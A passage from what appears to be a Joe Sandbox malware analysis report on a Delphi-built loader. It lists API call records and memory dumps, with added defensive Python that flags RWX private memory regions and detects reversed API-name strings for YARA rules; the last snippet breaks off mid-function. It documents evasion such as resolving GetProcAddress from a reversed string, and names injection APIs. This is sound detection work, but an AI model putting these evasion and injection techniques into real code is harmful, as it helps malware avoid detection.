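        "decoded": {c.api: decode(c) for c in calls if decode(c)},
    }


if __name__ == "__main__":
    print(json.dumps(summarize(SAMPLE_TRACE), indent=2))
```

On the sample the NtCreateFile record decodes to DesiredAccess = FILE_WRITE_DATA | SYNCHRONIZE, ShareAccess = FILE_SHARE_READ, CreateDisposition = FILE_CREATE and CreateOptions = FILE_SYNCHRONOUS_IO_NONALERT, i.e. a synchronous create-new-and-write of a file whose name arrives through RtlDosPathNameToNtPathName_U; the LoadLibraryExA record decodes to LOAD_LIBRARY_AS_DATAFILE with the Borland locale key on the stack. The same parser runs unchanged over the "Part of subcall function" lines, since it searches for the call pattern rather than anchoring on the bullet.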
                                                                                                                                          APIs
                                                                                                                                          • RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Path$DeleteFileNameName_
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 4284456518-0
                                                                                                                                          • Opcode ID: 3c3aa9ce43d245acc35ab01bb146c5a04b9e229c3502ee9239558b355969a0a2
                                                                                                                                          • Instruction ID: 3b790708687cfb13ab32bf863ca386910c2b5f9fc4f3a588f69acef1d8335997
                                                                                                                                          • Opcode Fuzzy Hash: 3c3aa9ce43d245acc35ab01bb146c5a04b9e229c3502ee9239558b355969a0a2
                                                                                                                                          • Instruction Fuzzy Hash: CF016275985A086EEB05EBB0CE51FCD77B9AF48708F5144929280FB481DFB4AB048B24
                                                                                                                                          APIs
                                                                                                                                            • Part of subcall function 02A94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02A94F2E
                                                                                                                                          • RtlI.N(?,?,00000000,02AADC7E), ref: 02AADC2C
                                                                                                                                          • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC42
                                                                                                                                          • NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,02AADC7E), ref: 02AADC61
                                                                                                                                            • Part of subcall function 02A94C60: SysFreeString.OLEAUT32(02AAF4A4), ref: 02A94C6E
                                                                                                                                          Similarity
                                                                                                                                          • API ID: PathString$AllocDeleteFileFreeNameName_
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1530111750-0
                                                                                                                                          • Opcode ID: e36a5c6efdc41e72a813133955915905ae7e4f644d3f1e8fa6e9504c5dc106e8
                                                                                                                                          • Instruction ID: 6a72ada71fe318a431daa0817b1e0f63a1e64f2a129a5ed29f6f3b64ca37ac46
                                                                                                                                          • Opcode Fuzzy Hash: e36a5c6efdc41e72a813133955915905ae7e4f644d3f1e8fa6e9504c5dc106e8
                                                                                                                                          • Instruction Fuzzy Hash: 9701217598060CBEEB01EBA0DE52FCDB3FDEB48704F5044A2A240E7580EF746B048A64
                                                                                                                                          APIs
                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02A97FF5
                                                                                                                                          Similarity
                                                                                                                                          • API ID: DiskFreeSpace
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1705453755-0
                                                                                                                                          • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                          • Instruction ID: 3f3cbcd95e543446f7f0efd9875f6055967daf9d5b0cadac6b67cb5ccc7881e2
                                                                                                                                          • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                                          • Instruction Fuzzy Hash: F111C0B5E00209AF9B04CF99C981DBFF7F9FFC8700B54C569A509E7254E6719A018BA0
                                                                                                                                          APIs
                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          Similarity
                                                                                                                                          • API ID: InfoLocale
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 2299586839-0
                                                                                                                                          • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                          • Instruction ID: cbed90ffc0c27c8e33b38ea2bb7aba6e621fa97542bb7b753c387ccfd509de89
                                                                                                                                          • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                                          • Instruction Fuzzy Hash: 94E0D87170422457DB15A69A9D81EFA72ED9B5C710F00427BBE05C7385EDE19E804BE4
                                                                                                                                          APIs
                                                                                                                                          • GetVersionExA.KERNEL32(?,02ABD106,00000000,02ABD11E), ref: 02A9B79A
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Version
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1889659487-0
                                                                                                                                          • Opcode ID: c4ad6beb2c5bb836c50da6b15f055a4b3724536a13fa5c823ff0e69f5b950f95
                                                                                                                                          • Instruction ID: 0ddab9458f0a4fe180678bab31b276f20c529ff2a578e6f8063a7c9fe9c9432f
                                                                                                                                          • Opcode Fuzzy Hash: c4ad6beb2c5bb836c50da6b15f055a4b3724536a13fa5c823ff0e69f5b950f95
                                                                                                                                          • Instruction Fuzzy Hash: 97F04474944301DFC741CF29E64065573E9FB48B00F808D28E688C3B91EF38C495CB62
                                                                                                                                          APIs
                                                                                                                                          • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02A9BE72,00000000,02A9C08B,?,?,00000000,00000000), ref: 02A9A823
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
• Instruction ID: b94794543684ccc95b0f2fb744dc54b6444bf11f983ca16ebed85db535116cba
• Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
• Instruction Fuzzy Hash: 9FD05EB230E2602AAA14925B2D84D7B5AECCAC57A1F00803ABA88C6102DE008C07DAB1
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction ID: c168220f45e66db2a600ffd00f4f34e7a72a40da258ad0e3242294ce1a5bdeef
• Opcode Fuzzy Hash: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction Fuzzy Hash: 4FA01250444820418D4033190C0253430845C10E20FC4874068F8402D0ED1D01208093
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
• Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
• Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
APIs
• GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02A9D29D
  • Part of subcall function 02A9D268: GetProcAddress.KERNEL32(00000000), ref: 02A9D281
Similarity
• API ID: AddressHandleModuleProc
• String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
• API String ID: 1646373207-1918263038
• Opcode ID: 7c5a993392f8a2c1659a4ca24ac6467aa1c00b8225103fbec6358798331d3fb5
• Instruction ID: 8d906a3fc74f420232bc5b62114f01056b80137afd68b961e479abca0a6db84a
• Opcode Fuzzy Hash: 7c5a993392f8a2c1659a4ca24ac6467aa1c00b8225103fbec6358798331d3fb5
• Instruction Fuzzy Hash: CA411B71AC8B085B5E08BA6F7600427F7DED79AB543E0461BF4458B380DE20FCD29E69
APIs
• GetModuleHandleA.KERNEL32(ole32.dll), ref: 02AA6EDE
• GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02AA6EEF
• GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02AA6EFF
• GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02AA6F0F
• GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02AA6F1F
• GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02AA6F2F
• GetProcAddress.KERNEL32(00000000,CoSuspendClassObjects), ref: 02AA6F3F
Similarity
• API ID: AddressProc$HandleModule
• String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
• API String ID: 667068680-2233174745
• Opcode ID: f733442199b730928d56e38f1b5b8e9e822eea45a578f868fe80d2370ce144e7
• Instruction ID: 9ad088871dd17d72a94733978f16db9e130b4afcba8113e68722ace5994705c2
• Opcode Fuzzy Hash: f733442199b730928d56e38f1b5b8e9e822eea45a578f868fe80d2370ce144e7
• Instruction Fuzzy Hash: 70F098F2AC83807DBE05BB715E9186A279DBD21F053482C1AAA0356552EF7A9421CE10
APIs
• MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02A928CE
Similarity
• API ID: Message
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
• API String ID: 2030045667-32948583
• Opcode ID: 891113bbb035af123a09c9c0d32621887dfd9263a54834c933df4e932387b6bf
• Instruction ID: 280c3dae7e4e08bdc340302f70642382397af7f3f6aa4013dd78685bd1d8b2bd
• Opcode Fuzzy Hash: 891113bbb035af123a09c9c0d32621887dfd9263a54834c933df4e932387b6bf
• Instruction Fuzzy Hash: 84A1C330A04264AFDF21AB2ECCC4BD9B6F5EB09354F1440E5ED49AB285CF758989CF51
Strings
• , xrefs: 02A92814
• An unexpected memory leak has occurred. , xrefs: 02A92690
• The sizes of unexpected leaked medium and large blocks are: , xrefs: 02A92849
• 7, xrefs: 02A926A1
• bytes: , xrefs: 02A9275D
• Unexpected Memory Leak, xrefs: 02A928C0
• The unexpected small block leaks are:, xrefs: 02A92707
Similarity
• API ID:
• String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
• API String ID: 0-2723507874
• Opcode ID: d1e305314adc4ae151d57110c9b8fee4e64b3c7e3e8e15ddd4ff1eb4b17b573f
• Instruction ID: c8de3e9445e77084d75ace712584849f70ed8313cffa4df5cb7b45f548cb47ac
• Opcode Fuzzy Hash: d1e305314adc4ae151d57110c9b8fee4e64b3c7e3e8e15ddd4ff1eb4b17b573f
• Instruction Fuzzy Hash: 0F71B230A042A89FDF219B2ECC84BD9BAF5EB09354F5040E5D949EB281DF754AC9CF51
APIs
• GetThreadLocale.KERNEL32(00000000,02A9C08B,?,?,00000000,00000000), ref: 02A9BDF6
  • Part of subcall function 02A9A7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02A9A7E2
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                          • Opcode ID: f173d354efb2745feef18e4a983958421ed1c4196018ea939c5f23f38e97388b
                                                                                                                                          • Instruction ID: 4435f968047153ba97a3d1aa0f40093c101855c958cf891eef45e45b8d625f19
                                                                                                                                          • Opcode Fuzzy Hash: f173d354efb2745feef18e4a983958421ed1c4196018ea939c5f23f38e97388b
                                                                                                                                          • Instruction Fuzzy Hash: 85613F34B502489BDF00EBA6DA90B9FB7FB9B8C700F509836A1019B745DE39DD068F65
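The dotted names under Memory Dump Source encode where each dump was taken. The Python below is an added example, not part of the Joe Sandbox report, that parses those names and decodes the embedded Windows memory constants. The field order it assumes (process index, dump index, sequence number, base address, page protection, allocation state, allocation type, reserved) is my reading of the values and not something this page documents: 0x02, 0x04, 0x20 and 0x40 are PAGE_READONLY, PAGE_READWRITE, PAGE_EXECUTE_READ and PAGE_EXECUTE_READWRITE, 0x1000 is MEM_COMMIT and 0x20000 is MEM_PRIVATE, and that assignment is the only one that makes every name on this page consistent. The six names fed to it are the ones listed in the record above.

```python
import re
from dataclasses import dataclass
from typing import List

# Windows memory constants from winnt.h.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}
MEM_STATE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x10000: "MEM_FREE"}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# ASSUMED field order (inferred from the values on the page, not documented by Joe Sandbox):
# proc.dump.sequence.base.protect.state.type.reserved.sdmp
SDMP_RE = re.compile(
    r"(?P<proc>\d{8})\.(?P<dump>\d{8})\.(?P<seq>\d+)\.(?P<base>[0-9A-Fa-f]{16})"
    r"\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})"
    r"\.(?P<mtype>[0-9A-Fa-f]{8})\.(?P<reserved>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    proc: int
    dump: int
    seq: int
    base: int
    protect: int
    state: int
    mtype: int

    @property
    def protect_name(self) -> str:
        base = PAGE_PROTECT.get(self.protect & 0xFF, f"0x{self.protect & 0xFF:02X}")
        mods = [n for bit, n in PAGE_MODIFIERS.items() if self.protect & bit]
        return "|".join([base] + mods)

    @property
    def executable(self) -> bool:
        return bool(self.protect & 0xF0)   # any PAGE_EXECUTE* value

    @property
    def writable(self) -> bool:
        return bool(self.protect & 0xCC)   # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY

    @property
    def state_name(self) -> str:
        return MEM_STATE.get(self.state, f"0x{self.state:X}")

    @property
    def type_name(self) -> str:
        return MEM_TYPE.get(self.mtype, f"0x{self.mtype:X}")


def parse_dump_name(name: str) -> DumpRegion:
    """Decode one .sdmp file name into its region attributes."""
    m = SDMP_RE.search(name.strip())
    if not m:
        raise ValueError(f"not an sdmp name: {name!r}")
    return DumpRegion(
        proc=int(m["proc"]), dump=int(m["dump"]), seq=int(m["seq"]),
        base=int(m["base"], 16), protect=int(m["protect"], 16),
        state=int(m["state"], 16), mtype=int(m["mtype"], 16),
    )


def rwx_private(names: List[str]) -> List[DumpRegion]:
    """Committed, private, writable and executable regions: where an unpacked stage usually lives."""
    regions = [parse_dump_name(n) for n in names]
    return [r for r in regions
            if r.state == 0x1000 and r.mtype == 0x20000 and r.executable and r.writable]


# The six dump names listed under "Memory Dump Source" in the record above.
REPORT_DUMPS = [
    "00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp",
    "00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp",
]

if __name__ == "__main__":
    for r in (parse_dump_name(n) for n in REPORT_DUMPS):
        print(f"{r.base:08X} {r.protect_name:24} {r.state_name} {r.type_name}")
    print("RWX private:", [f"{r.base:08X}" for r in rwx_private(REPORT_DUMPS)])
```

Run over the six names above, it flags 02B17000, 02C0B000 and 02C0E000 as committed private RWX regions, and shows the module at 02A90000 (read-only header, execute-read code at 02A91000, which the plugin treats as a PE: "based on PE: true") sitting in MEM_PRIVATE memory rather than MEM_IMAGE. Under this reading that module was not mapped from a file by the Windows loader, which is what you expect of a stage unpacked into memory and is consistent with the injection signatures in the report summary. Treat the decoding as a triage hint rather than proof, since the field assignment is inferred.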
APIs
• GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8,?,?,02ABE7A8,02A965B1,02ABD30D), ref: 02A94395
• WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8,?,?,02ABE7A8,02A965B1,02ABD30D), ref: 02A9439B
• GetStdHandle.KERNEL32(000000F5,02A943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?,02B167C8), ref: 02A943B0
• WriteFile.KERNEL32(00000000,000000F5,02A943E4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02A94423,?,?), ref: 02A943B6
• MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02A943D4
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: FileHandleWrite$Message
• String ID: Error$Runtime error at 00000000
• API String ID: 1570097196-2970929446
• Opcode ID: 7ce6d39484e07ff8f6e4e14d0d0f10077390e10e64d6aa329f9e977720ea6efd
• Instruction ID: 942beda77cac2fad8129d0e4bbf4e5d853dba32eb2a48f56b9ec09ef8d45e286
• Opcode Fuzzy Hash: 7ce6d39484e07ff8f6e4e14d0d0f10077390e10e64d6aa329f9e977720ea6efd
• Instruction Fuzzy Hash: 83F02B70AD4300B5FE11A3727E46F9A23EC9708F51FA00A49B314594D1DFE440C98F51
APIs
  • Part of subcall function 02A9AD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02A9AD59
  • Part of subcall function 02A9AD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02A9AD7D
  • Part of subcall function 02A9AD3C: GetModuleFileNameA.KERNEL32(02A90000,?,00000105), ref: 02A9AD98
  • Part of subcall function 02A9AD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02A9AE2E
• CharToOemA.USER32(?,?), ref: 02A9AEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF1E
• GetStdHandle.KERNEL32(000000F4,02A9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF33
• WriteFile.KERNEL32(00000000,000000F4,02A9AF88,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02A9AF39
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02A9AF5B
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02A9AF71
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
• String ID:
• API String ID: 185507032-0
• Opcode ID: 4b744950a891a92c8b3ba510d5af0423a2e36ec14d982a5ca6f98cd6fb5ba1f3
• Instruction ID: 2edc53b63e6f6d453c9dace00131e4f5db8615b17da54b03bd99a66899f68f50
• Opcode Fuzzy Hash: 4b744950a891a92c8b3ba510d5af0423a2e36ec14d982a5ca6f98cd6fb5ba1f3
• Instruction Fuzzy Hash: D4114CB2584200BADA00FBA9CE85F9B77EDAF44B00F804916B754D70D1DE75E9448B62
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02A9E625
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02A9E641
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02A9E67A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02A9E6F7
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02A9E710
• VariantCopy.OLEAUT32(?,00000000), ref: 02A9E745
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction ID: 2f88667127f601bc06bc9b028ff2ade70245f4257435c5f8e935aa21192d9156
• Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction Fuzzy Hash: 3751F9759416299BCF22EB59CA80BD9B3FDAF49300F4045D6E608E7212DE30AF858F61
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A935BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02A93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A935ED
• RegCloseKey.ADVAPI32(?,02A93610,00000000,?,00000004,00000000,02A93609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02A93603
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 528d04ce52442bb5b88d6e5514b5366e3294d42e91dae182e2d08e470f45e631
• Instruction ID: d19c18b2875718523de3022d9b1af9b16f280837b210bb4e0b70e4418b1f0eae
• Opcode Fuzzy Hash: 528d04ce52442bb5b88d6e5514b5366e3294d42e91dae182e2d08e470f45e631
• Instruction Fuzzy Hash: 2A01B575984218BAEF11DBD28E42BBEB7FCE708B00F5005A1BB04D6680EE74A511CA59
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02AA82FC,?,?,00000000,00000000,?,02AA8215,00000000,KernelBASE,00000000,00000000,02AA823C), ref: 02AA82C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02AA82C7
• GetProcAddress.KERNEL32(?,?), ref: 02AA82D9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1352875832.0000000002A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02A90000, based on PE: true
• Associated: 00000000.00000002.1352859439.0000000002A90000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1352966142.0000000002ABE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002B17000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1353132939.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2a90000_z10982283782.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
• API String ID: 667068680-1372893251
• Opcode ID: eab24ca62eafe967a4151033a9a692d8b760b86ba85c03048fa3dbafce73f8d2
• Instruction ID: 74bf214b170fc22654b9a340d8857e74a9909bb031bf1cd0503a9a563e71e631
• Opcode Fuzzy Hash: eab24ca62eafe967a4151033a9a692d8b760b86ba85c03048fa3dbafce73f8d2
• Instruction Fuzzy Hash: AD012C75680304BFEB04EBA5ED51A5EB7EEFB4CB00F9184A0B90097600DF74AA01DA24
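The Similarity strings of the GetModuleHandleW/GetProcAddress record above, Kernel32 and sserddAcorPteG, are the point of interest: sserddAcorPteG is GetProcAddress written backwards, so the code can resolve GetProcAddress at runtime while the forward name never appears in the binary (a static string scan or an import-table check for GetProcAddress finds nothing; only the module name Kernel32 is left in the clear). The neighbouring records (the FastMM "unexpected memory leak" text, the SOFTWARE\Borland\Delphi\RTL FPUMaskValue lookup, "Runtime error at", the locale and calendar initialisation) are stock Delphi RTL code; this record is the loader's own resolver and is what the "Contains functionality to dynamically determine API calls" signature in the summary keys on. The Python below is an added example, not code from Joe Sandbox or from the sample: it scans a byte buffer for reversed forms of a watch-list of API names in both ASCII and UTF-16LE, drops hits that are merely the tail of a longer match (VirtualAlloc inside VirtualAllocEx), and emits an equivalent YARA rule. The watch-list and the test buffer are constructed for the example; a real scan would take the export names of kernel32, ntdll and advapi32 as the list.

```python
from typing import Iterable, List, Tuple

# Constructed watch-list: APIs a loader typically resolves by hand. Short names are
# left out on purpose; a reversed five-letter word matches by chance far too often.
API_NAMES = [
    "GetProcAddress", "LoadLibraryA", "LoadLibraryW", "GetModuleHandleA",
    "GetModuleHandleW", "VirtualAlloc", "VirtualAllocEx", "VirtualProtect",
    "WriteProcessMemory", "CreateRemoteThread", "NtUnmapViewOfSection",
    "SetThreadContext", "ResumeThread", "QueueUserAPC",
    "CheckRemoteDebuggerPresent", "IsDebuggerPresent",
]


def reversed_api_forms(name: str) -> List[Tuple[str, bytes]]:
    """Byte patterns the reversed name takes in memory: narrow (ASCII) and wide (UTF-16LE)."""
    rev = name[::-1]
    return [("ascii", rev.encode("ascii")), ("utf-16le", rev.encode("utf-16-le"))]


def find_reversed_api_names(data: bytes, names: Iterable[str] = API_NAMES) -> List[Tuple[int, str, str]]:
    """Return (offset, api_name, encoding) for every reversed API name found in data."""
    raw = []  # (start, end, name, encoding)
    for name in names:
        for enc, needle in reversed_api_forms(name):
            pos = data.find(needle)
            while pos != -1:
                raw.append((pos, pos + len(needle), name, enc))
                pos = data.find(needle, pos + 1)
    # Keep only hits that are not wholly contained in a longer hit, so a reversed
    # "VirtualAllocEx" is reported once rather than also as "VirtualAlloc".
    kept = [h for h in raw
            if not any(o is not h and o[0] <= h[0] and h[1] <= o[1] for o in raw)]
    return sorted((s, n, e) for s, _, n, e in kept)


def yara_rule(names: Iterable[str] = API_NAMES, rule_name: str = "reversed_api_names") -> str:
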